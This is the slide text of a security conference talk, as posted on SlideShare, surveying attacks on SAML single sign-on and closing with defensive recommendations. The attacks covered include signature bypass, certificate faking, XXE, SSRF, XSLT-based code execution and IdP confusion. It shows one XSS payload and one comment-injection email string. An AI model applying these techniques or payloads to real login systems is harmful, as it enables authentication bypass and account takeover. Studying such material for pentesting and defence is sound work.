SlideShare uma empresa Scribd logo

How to break SAML if I have paws?

G
GreenD0g

Overview of "how to hack SAML" from a security conference - KazHackStan https://kazhackstan.com/en/ In this talk, we will figure out how to break Single Sign On(SSO) based on SAML. Let's look at the components of SAML and the associated attack vectors, current vulnerabilities and methods of their exploitation. Everything a pentester needs to pohakat SAML without soiling the fur.

Software
1 de 42
Baixar para ler offline
Суповой набор №5а. Как ломать SAML, если у меня лапки? How to hack SAML if I have paws? Aleksei “GreenDog” Tiurin
WHOAMI? - Security researcher - Invicti Security (Acunetix) - Зеленые лапки расслабленности t.me/greenrelaxpaws agrrrdog.blogspot.com github.com/GrrrDog/ Aleksei Tiurin GreenDog
SAML - Security Assertion Markup Language ● SSO ● Authentication and authorization ● Everywhere
SAML - Security Assertion Markup Language ● Very old standards (~2002-2005) ○ SAML 1.0 / 2.0 ● Based on ○ HTTP ○ XML ○ XML Schema ○ XML Digital Signature (XML DSig) ○ XML Encryption ● Complicated standards ○ Protocols/Bindings/Profiles ○ Full specs - hundreds of pages
“10 Years later” ● Old technologies -> old libs ○ xmlsec (java / c) ● Complex configurations ● Many Implementations https://en.wikipedia.org/wiki/SAML-based_products_and_services ● ZeroNights 2012 ● (almost) All the same attacks ^_^
Identity Provider (IdP) - where user creds are stored - Okta, OneLogin, PingIdentity, MS AAD, etc - OpenAM, Keycloak, Oracle OAM, Shibboleth, etc Service Provider (SP) - an application that a user wants to access - … Jira, WordPress, AWS ...
- One IdP - many SPs - Corporate SSO - One SP - many IdPs - SaaS that needs to support multiple organizations
Flows - SP initiated - IdP initiated (from 4) SAML Request SAML Response
SAMLRequest - From SP toIdP - Redirect Binding (GET) / POST Binding (HTML Form) - Base64
SAMLResponse - From IdP to SP - POST Binding HTML form - Base64 + Deflate
SAMLResponse - Signed Response - Signed Assertion - Both
How does the signature work?
Situations: - Anonymous attacks - A user in IdP - Malicious SP - Malicious IdP Core tool - SAML Raider extension in Burp
Anonymous attacks 1. SAMLRequest - Detect that SAML is used 2. From SAMLRequest - Issuer (IdP) - AssertionConsumerServiceURL (ACS) - where SP expects SAMLResponse - SP’s SAML lib name - id generator - format, name, etc - Destination (IdP)
SAML Metadata - Configuration exchange for SP and IdP - Names, endpoints, certificates… - Signature, encryption, additional attributes… SP doesn’t expose it (usually) IdP: - know endpoints - oamfed/idp/metadata - from Destination - okta.com/app/appname/RND/sso/saml-> - okta.com/app/RND/sso/saml/metadata Now, we have almost everything to create a good SAMLResponse from nothing
Creating SAML Response - POST to ACS url - Known SAML schemas - Info from SAMLRequest - Destination - ACS url - InResponseTo - ID - Issue Timestamp - Issuer - From metadata - Both Response and Assertion - Subject / NameID - email? - Conditions - NotBefore + NotOnOrAfter - AudienceRestriction - ? - AuthnStatement - ? http://www.datypic.com/sc/saml2/e-samlp_Response.html http://www.datypic.com/sc/saml2/e-saml_Assertion.html
1. XML -> XXE (+XSD/NS injection?) - https://nvd.nist.gov/vuln/detail/CVE-2022-35741 2. XSS - Often show errors for debug - Before Sign check - Issuer, Destination, StatusCode, etc - using the created SAML Response - XSS payload -> every “field” - encode/CDATA Destination="><img/src/onerror=alert(1)>" SAML Response
Authentication bypass - Disabled sign check - common misconfig - No <Signature/> tag - no Sign check https://hackerone.com/reports/136169 - Complicated specifications - - nobody uses advanced features - Documentation (SP/IdP)? - NameID - email - Find a registered email? - Auto provisioning - Create SAML Response(s) - Try them - Error messages https://mishresec.wordpress.com/2017/10/13/uber-bug-bounty-gaining-access-to-an-inter nal-chat-system/
KeyInfo - Info about the key - ds:Signature - Self-Signed certificate SAML Response
Certificate faking for Authentication bypass - Take Certificate from Metadata - Import in SAML Raider - Sign the created SAML Response(s) - Incorrect certificate match - Trust KeyInfo certificate https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/#certificate-faking SAML Response
Dupe Key Confusion (.NET) - Alvaro Muñoz, Oleksandr Mirosh at BlackHat 2019 https://i.blackhat.com/USA-19/Wednesday/us-19-Munoz-SSO-Wars-The-Token-Menace.pdf - Better with a valid SAML Response SAML Response
Certificate validation to SSRF - Trust KeyInfo certificate - Certificate validation - SSRF in X509 cert - Michael Stepankin at BlackHat 2023 https://github.com/onhexgroup/Conferences/blob/main/Black%20Hat%20USA%202023%20slides/Michael %20Stepankin_mTLS%20When%20Certificate%20Authentication%20is%20Done%20Wrong.pdf - Java - AIA, SIA, CRL DP - Created SAML Response - Add KeyInfo with SSRF cert - Windows? .NET?
Reference dereferencing - Data location - URI - remote files (http, https, etc) - local files - (Blind) SSRF - Everywhere! - XML DSig - XML Enc - Metadata - … SAML Response
Reference dereferencing (XML DSig) - Reference https://github.com/IdentityPython/pysaml2/issues/510 - KeyInfo - Java xmlsec. SecureValidation bypass (CVE-2021-40690) https://blog.tint0.com/2021/09/pinging-xmlsec.html SAML Response
Reference dereferencing (XML Enc) - CipherReference - DataReference - + EncryptedKey -> KeyInfo
Transformations - XML “normalization” - Additional “preparations” - Base64 - XPath - XPath-Filter - XSLT (optional) - …
Base64 http://www.w3.org/2000/09/xmldsig#base64 - .NET XXE CVE-2022-34716 - Decode Reference + Parse XML - XXE inside https://bugs.chromium.org/p/project-zero/issues/detail?id=2313
XPath http://www.w3.org/TR/1999/REC-xpath-19991116 - Blind SSRF - Mix with Reference (xml files) - Error - Modified version of a payload for PingIdentity from https://blog.tint0.com/2021/09/pinging-xmlsec.html
XSLT http://www.w3.org/TR/1999/REC-xslt-19991116 - Java / Santuario (xmlsec) <= 1.4.1 (~ 2010) - via Xalan - RCE ManageEngine ServiceDesk CVE-2022-47966
xmlsec >= 1.4.2 - Secure-processing - true - Xalan CVE-2014-0107 < 2.7.2 - Arbitrary class instantiation https://blog.viettelcybersecurity.com/saml-show-stopper/
XSLT https://blog.viettelcybersecurity.com/saml-show-stopper/
How can we test dereference/transformations? - Acunetix - No manual tools - SAML Raider - no Algorithm - unparsed-text - XSLT 2.0 - it won’t detect CVE-2022-47966 (java xmlsec)
Attacks on IdP - Signed SAMLRequest (AuthnRequest) - SP->IdP - Redirect-POST -> POST-POST bindings - SAML protocol: LogoutRequest, etc - Metadata import (Malicious SP/IdP) - Same attack vectors
With creds / Malicious SP/IdP - Transformation after Sign check - Post-auth - “Malicious” SP/IdP - Generate a valid signature for arbitrary transformations - How? SAML Response
More attacks on IdP (w/ creds) ACSSpoofing Attack - Change SAMLRequest ACS url to an attacker’ server - Old https://web-in-security.blogspot.com/2015/04/on-security-of-saml-based-identity.html - is it string or url comparison? XML injection - SAMLRequest is not signed - Values from SAMLRequest reflected in SAMLResponse - copy as string - add new tags/attributes - correctly signed https://research.nccgroup.com/2021/03/29/saml-xml-injection/
Attacks on SP (w/ creds) - Sign check, Cert-related, etc - XSW (w/ SAML Raider) - XML parsing - Comment injection https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations - ~ 2017 - admin@victim.com<!---->.attacker.pw - admin@victim.com vs admin@victim.com.attacker.pw - <? anything ?> - processing instructions inside XML - Much more - Logic vulnerabilities - “how to put things together” - very common
Session handling RelayState - State Preservation - URL - “Open Redirect” https://hackerone.com/reports/1923672 https://www.anitian.com/owning-saml/
Multitenant (1 SP - many IdPs) Don’t trust IdP - Auth based on SAML Response - Manipulate NameId, Issuer, ACS - Email from another tenant -> access IdP confusion https://hackerone.com/reports/976603 - IdP victim - “IdP1” - IdP attacker - “IdP1 ” (with a space at the end) - Sign check w/ victim’s IdP, log in to the attacker’s account
Recommendations - Don’t implement SAML “lib” yourself - Use 3rd party libs - Update libs systematically - Show a generic error - Disable unnecessary features - KeyInfo? XML Enc? - Be careful w/ metadata - Always pentest your SAML implementation in SP - Pentest your IdP if it’s not SaaS - Write me if you have any questions
Big thanks to the researchers of mentioned articles/white papers/tools
New cheat sheet about SAML? https://github.com/GrrrDog/ Зеленые лапки расслабленности https://t.me/greenrelaxpaws
How to break SAML if I have paws?

Recomendados

Red Dragon's CYBER Security RSS Feed .docx version
Red Dragon's CYBER Security RSS Feed .docx versionRed Dragon's CYBER Security RSS Feed .docx version
Red Dragon's CYBER Security RSS Feed .docx version
Bill Hagestad II
 
Presentation citrix internals ica connectivity
Presentation citrix internals ica connectivityPresentation citrix internals ica connectivity
Presentation citrix internals ica connectivity
xKinAnx
 
Citrix Netscaler Deployment Guide
Citrix Netscaler Deployment GuideCitrix Netscaler Deployment Guide
Citrix Netscaler Deployment Guide
Citrix
 
RabbitMQ Server - cheat sheet -
RabbitMQ Server - cheat sheet -RabbitMQ Server - cheat sheet -
RabbitMQ Server - cheat sheet -
Naoto MATSUMOTO
 
Static Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and YouStatic Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and You
Kevin Fealey
 
Madrid meetup #7 deployment models
Madrid meetup #7 deployment modelsMadrid meetup #7 deployment models
Madrid meetup #7 deployment models
Mario Alberto Martinez Lopez
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
VLDB 2009 Tutorial on Column-Stores
VLDB 2009 Tutorial on Column-StoresVLDB 2009 Tutorial on Column-Stores
VLDB 2009 Tutorial on Column-Stores
Daniel Abadi
 

Recomendados

Red Dragon's CYBER Security RSS Feed .docx version
Red Dragon's CYBER Security RSS Feed .docx versionRed Dragon's CYBER Security RSS Feed .docx version
Red Dragon's CYBER Security RSS Feed .docx version
Bill Hagestad II
 
Presentation citrix internals ica connectivity
Presentation citrix internals ica connectivityPresentation citrix internals ica connectivity
Presentation citrix internals ica connectivity
xKinAnx
 
Citrix Netscaler Deployment Guide
Citrix Netscaler Deployment GuideCitrix Netscaler Deployment Guide
Citrix Netscaler Deployment Guide
Citrix
 
RabbitMQ Server - cheat sheet -
RabbitMQ Server - cheat sheet -RabbitMQ Server - cheat sheet -
RabbitMQ Server - cheat sheet -
Naoto MATSUMOTO
 
Static Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and YouStatic Analysis Security Testing for Dummies... and You
Static Analysis Security Testing for Dummies... and You
Kevin Fealey
 
Madrid meetup #7 deployment models
Madrid meetup #7 deployment modelsMadrid meetup #7 deployment models
Madrid meetup #7 deployment models
Mario Alberto Martinez Lopez
 
Threat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill ChainThreat Hunting with Cyber Kill Chain
Threat Hunting with Cyber Kill Chain
Suwitcha Musijaral CISSP,CISA,GWAPT,SNORTCP
 
VLDB 2009 Tutorial on Column-Stores
VLDB 2009 Tutorial on Column-StoresVLDB 2009 Tutorial on Column-Stores
VLDB 2009 Tutorial on Column-Stores
Daniel Abadi
 
NetScaler ADC - Customer Overview
NetScaler ADC - Customer OverviewNetScaler ADC - Customer Overview
NetScaler ADC - Customer Overview
Michelle Guerrero Montalvo
 
PostgreSQL - backup and recovery with large databases
PostgreSQL - backup and recovery with large databasesPostgreSQL - backup and recovery with large databases
PostgreSQL - backup and recovery with large databases
Federico Campoli
 
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Databricks
 
Vagrant
VagrantVagrant
Vagrant
Evans Ye
 
5 things you didn't know nginx could do
5 things you didn't know nginx could do5 things you didn't know nginx could do
5 things you didn't know nginx could do
sarahnovotny
 
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes PolatoğluSızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Furkan Enes Polatoglu
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router Eğitimi
BGA Cyber Security
 
Software Project Management using Redmine
Software Project Management using RedmineSoftware Project Management using Redmine
Software Project Management using Redmine
Ritesh Tamrakar
 
AZ-900T01 Microsoft Azure Fundamentals-01.pptx
AZ-900T01 Microsoft Azure Fundamentals-01.pptxAZ-900T01 Microsoft Azure Fundamentals-01.pptx
AZ-900T01 Microsoft Azure Fundamentals-01.pptx
sayyedghazali
 
Distributed Locking in Kubernetes
Distributed Locking in KubernetesDistributed Locking in Kubernetes
Distributed Locking in Kubernetes
Rafał Leszko
 
Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)
Brian K. Dickard
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
BGA Cyber Security
 
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
NETWAYS
 
NGINX: Basics and Best Practices
NGINX: Basics and Best PracticesNGINX: Basics and Best Practices
NGINX: Basics and Best Practices
NGINX, Inc.
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
Pichaya Morimoto
 
Introducing ELK
Introducing ELKIntroducing ELK
Introducing ELK
AllBits BVBA (freelancer)
 
OWASP Top 10 for Mobile
OWASP Top 10 for MobileOWASP Top 10 for Mobile
OWASP Top 10 for Mobile
Appvigil - Mobile App Security Scanner
 
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-inNews And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
ShapeBlue
 
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
Aurimas Mikalauskas
 
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetryMeasuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
ScyllaDB
 
Introduction to SAML 2.0
Introduction to SAML 2.0Introduction to SAML 2.0
Introduction to SAML 2.0
Mika Koivisto
 
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAMLAlfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
J V
 

Mais conteúdo relacionado

Mais procurados

Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Databricks
 
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes PolatoğluSızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Furkan Enes Polatoglu
 
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
NETWAYS
 
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-inNews And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
ShapeBlue
 
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
Aurimas Mikalauskas
 
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetryMeasuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
ScyllaDB
 

Mais procurados (20)

NetScaler ADC - Customer Overview
NetScaler ADC - Customer OverviewNetScaler ADC - Customer Overview
NetScaler ADC - Customer Overview
 
PostgreSQL - backup and recovery with large databases
PostgreSQL - backup and recovery with large databasesPostgreSQL - backup and recovery with large databases
PostgreSQL - backup and recovery with large databases
 
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
Redis + Structured Streaming—A Perfect Combination to Scale-Out Your Continuo...
 
Vagrant
VagrantVagrant
Vagrant
 
5 things you didn't know nginx could do
5 things you didn't know nginx could do5 things you didn't know nginx could do
5 things you didn't know nginx could do
 
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes PolatoğluSızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
Sızma Testi ve Güvenlik Uygulamaları El Kitabı - Furkan Enes Polatoğlu
 
Pfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router EğitimiPfsense Firewall ve Router Eğitimi
Pfsense Firewall ve Router Eğitimi
 
Software Project Management using Redmine
Software Project Management using RedmineSoftware Project Management using Redmine
Software Project Management using Redmine
 
AZ-900T01 Microsoft Azure Fundamentals-01.pptx
AZ-900T01 Microsoft Azure Fundamentals-01.pptxAZ-900T01 Microsoft Azure Fundamentals-01.pptx
AZ-900T01 Microsoft Azure Fundamentals-01.pptx
 
Distributed Locking in Kubernetes
Distributed Locking in KubernetesDistributed Locking in Kubernetes
Distributed Locking in Kubernetes
 
Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)Cloud Computing Risk Management (IIA Webinar)
Cloud Computing Risk Management (IIA Webinar)
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
OSDC 2018 | OPNsense: the “open” firewall for your datacenter by Thomas Niede...
 
NGINX: Basics and Best Practices
NGINX: Basics and Best PracticesNGINX: Basics and Best Practices
NGINX: Basics and Best Practices
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
 
Introducing ELK
Introducing ELKIntroducing ELK
Introducing ELK
 
OWASP Top 10 for Mobile
OWASP Top 10 for MobileOWASP Top 10 for Mobile
OWASP Top 10 for Mobile
 
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-inNews And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
News And Development Update Of The CloudStack Tungsten Fabric SDN Plug-in
 
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
MySQL Performance Tuning. Part 1: MySQL Configuration (includes MySQL 5.7)
 
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetryMeasuring P99 Latency in Event-Driven Architectures with OpenTelemetry
Measuring P99 Latency in Event-Driven Architectures with OpenTelemetry
 

Semelhante a How to break SAML if I have paws?

Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAMLAlfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
J V
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaroundGet Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
DataGeekery
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
Shreeraj Shah
 

Semelhante a How to break SAML if I have paws? (20)

Introduction to SAML 2.0
Introduction to SAML 2.0Introduction to SAML 2.0
Introduction to SAML 2.0
 
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAMLAlfresco: Implementing secure single sign on (SSO) with OpenSAML
Alfresco: Implementing secure single sign on (SSO) with OpenSAML
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
DevSecOps - automating security
DevSecOps - automating securityDevSecOps - automating security
DevSecOps - automating security
 
Being HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on PurposeBeing HAPI! Reverse Proxying on Purpose
Being HAPI! Reverse Proxying on Purpose
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Saml authentication bypass
Saml authentication bypassSaml authentication bypass
Saml authentication bypass
 
Super-NetOps Source of Truth
Super-NetOps Source of TruthSuper-NetOps Source of Truth
Super-NetOps Source of Truth
 
IdP, SAML, OAuth
IdP, SAML, OAuthIdP, SAML, OAuth
IdP, SAML, OAuth
 
Best Practices of IoT in the Cloud
Best Practices of IoT in the CloudBest Practices of IoT in the Cloud
Best Practices of IoT in the Cloud
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Seattle StrongLoop Node.js Workshop
Seattle StrongLoop Node.js WorkshopSeattle StrongLoop Node.js Workshop
Seattle StrongLoop Node.js Workshop
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaroundGet Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
Get Back in Control of your SQL with jOOQ - GeekOut by ZeroTurnaround
 
Scout xss csrf_security_presentation_chicago
Scout xss csrf_security_presentation_chicagoScout xss csrf_security_presentation_chicago
Scout xss csrf_security_presentation_chicago
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Brakeman
BrakemanBrakeman
Brakeman
 
Best Practices for IoT Security in the Cloud
Best Practices for IoT Security in the CloudBest Practices for IoT Security in the Cloud
Best Practices for IoT Security in the Cloud
 
Sails.js Intro
Sails.js IntroSails.js Intro
Sails.js Intro
 

Último

StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdfStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
steffenkarlsson2
 
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdfMicrosoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Q-Advise
 
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
Alluxio, Inc.
 
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
Andrea Goulet
 
JustNaik Solution Deck (stage bus sector)
JustNaik Solution Deck (stage bus sector)JustNaik Solution Deck (stage bus sector)
JustNaik Solution Deck (stage bus sector)
Max Lee
 

Último (20)

GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product UpdatesGraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
GraphSummit Stockholm - Neo4j - Knowledge Graphs and Product Updates
 
How to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabberHow to install and activate eGrabber JobGrabber
How to install and activate eGrabber JobGrabber
 
how-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdfhow-to-download-files-safely-from-the-internet.pdf
how-to-download-files-safely-from-the-internet.pdf
 
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdfStrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
StrimziCon 2024 - Transition to Apache Kafka on Kubernetes with Strimzi.pdf
 
INGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by DesignINGKA DIGITAL: Linked Metadata by Design
INGKA DIGITAL: Linked Metadata by Design
 
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
A Python-based approach to data loading in TM1 - Using Airflow as an ETL for TM1
 
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
COMPUTER AND ITS COMPONENTS PPT.by naitik sharma Class 9th A mittal internati...
 
SQL Injection Introduction and Prevention
SQL Injection Introduction and PreventionSQL Injection Introduction and Prevention
SQL Injection Introduction and Prevention
 
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdfMicrosoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
Microsoft 365 Copilot; An AI tool changing the world of work _PDF.pdf
 
Top Mobile App Development Companies 2024
Top Mobile App Development Companies 2024Top Mobile App Development Companies 2024
Top Mobile App Development Companies 2024
 
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
AI/ML Infra Meetup | Improve Speed and GPU Utilization for Model Training & S...
 
The Impact of PLM Software on Fashion Production
The Impact of PLM Software on Fashion ProductionThe Impact of PLM Software on Fashion Production
The Impact of PLM Software on Fashion Production
 
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
Entropy, Software Quality, and Innovation (presented at Princeton Plasma Phys...
 
Crafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM IntegrationCrafting the Perfect Measurement Sheet with PLM Integration
Crafting the Perfect Measurement Sheet with PLM Integration
 
JustNaik Solution Deck (stage bus sector)
JustNaik Solution Deck (stage bus sector)JustNaik Solution Deck (stage bus sector)
JustNaik Solution Deck (stage bus sector)
 
AI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning FrameworkAI/ML Infra Meetup | Perspective on Deep Learning Framework
AI/ML Infra Meetup | Perspective on Deep Learning Framework
 
10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf10 Essential Software Testing Tools You Need to Know About.pdf
10 Essential Software Testing Tools You Need to Know About.pdf
 
Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024Secure Software Ecosystem Teqnation 2024
Secure Software Ecosystem Teqnation 2024
 
OpenChain @ LF Japan Executive Briefing - May 2024
